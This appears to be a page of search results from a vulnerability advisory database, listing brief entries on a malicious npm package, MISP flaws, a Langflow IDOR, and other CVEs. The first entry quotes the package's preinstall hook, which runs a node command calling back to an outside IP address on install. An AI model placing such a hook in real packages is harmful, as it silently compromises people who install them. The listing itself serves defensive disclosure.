64091 matches found
Malicious code in ect-839201 (npm)
Source: amazon-inspector 0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3 package.json declares a preinstall lifecycle hook that runs node -e "require'http'.get'http://10.107.121.85:8001/callback839201'" on npm install. Thi...
CVE-2026-54396
An information disclosure vulnerability exists in the MISP AuthKey edit functionality. When a validation error occurs during an AuthKey edit request, the user dropdown was populated using the attacker-controlled AuthKey.userid value from the submitted request data. An authenticated user with...
CVE-2026-54397
MISP CVE-2026-54397 affects the non-REST event editing path. An authenticated user with event edit permissions could tamper with submitted form data to assign an event to a sharing_group_id the user is not authorized to use when distribution is set to sharing group distribution. The non-REST save...
CVE-2026-54396 MISP AuthKey edit endpoint allows authenticated user email enumeration
An information disclosure vulnerability exists in the MISP AuthKey edit functionality. When a validation error occurs during an AuthKey edit request, the user dropdown was populated using the attacker-controlled AuthKey.userid value from the submitted request data. An authenticated user with...
EUVD-2026-36552
A mass assignment vulnerability exists in MISP’s sharing group creation endpoint. When creating a new sharing group, the controller did not remove a user-supplied id field before saving the submitted data. In CakePHP, supplying a primary key in the save data can cause a create followed by save...
Security Bulletin: Unauthenticated Insecure Direct Object Reference (IDOR) Vulnerability in Langflow Desktop Image Download Endpoint
Summary IBM Langflow Desktop contains a vulnerability in its image retrieval functionality where the GET /api/v1/files/images/flowid/filename endpoint fails to enforce authentication and ownership validation, allowing any unauthenticated user to access image files by supplying a valid flow...
CVE-2026-42932 Naxclow IoT Platform Generation of Predictable Numbers or Identifiers
Naxclow device identifiers use fixed manufacturing prefixes combined with sequential counters, producing a fully predictable and enumerable identifier space. Because the platform also exposes an endpoint that reveals the current identifier high-water mark, the active fleet can be enumerated...
CVE-2026-48006
creationtimestamp | type | source
---|---|---
2026-06-12 18:09:49+00:00 | seen | https://bsky.app/profile/cve.skyfleet.blue/post/3mo4dkybdiu2q...
CVE-2026-53982
Capgo Console prior to 12.28.2 contains a denial-of-service vulnerability in its account deletion flow that allows an attacker to block authentication and onboarding functions by triggering account deletion while a device identifier is linked to the active session. The platform incorrectly...
MINI-CG89-VH7H-V25H
Bulletin has no description...
MINI-XRR2-G973-33Q6
Bulletin has no description...
MINI-5JRG-5H5V-WJV7
Bulletin has no description...
MINI-M834-WGWF-VQM5
Bulletin has no description...
MINI-RC43-JG5M-R99V
Bulletin has no description...
MINI-4XG5-G9MW-JMRW
Bulletin has no description...
MINI-746J-WPXJ-R84X
Bulletin has no description...
MINI-XVVV-2R2Q-388X
Bulletin has no description...
MINI-CW43-V4G6-PQ77
Bulletin has no description...
MINI-9R2H-27P3-Q2QX
Bulletin has no description...
MINI-J2J9-P5P3-79QV
Bulletin has no description...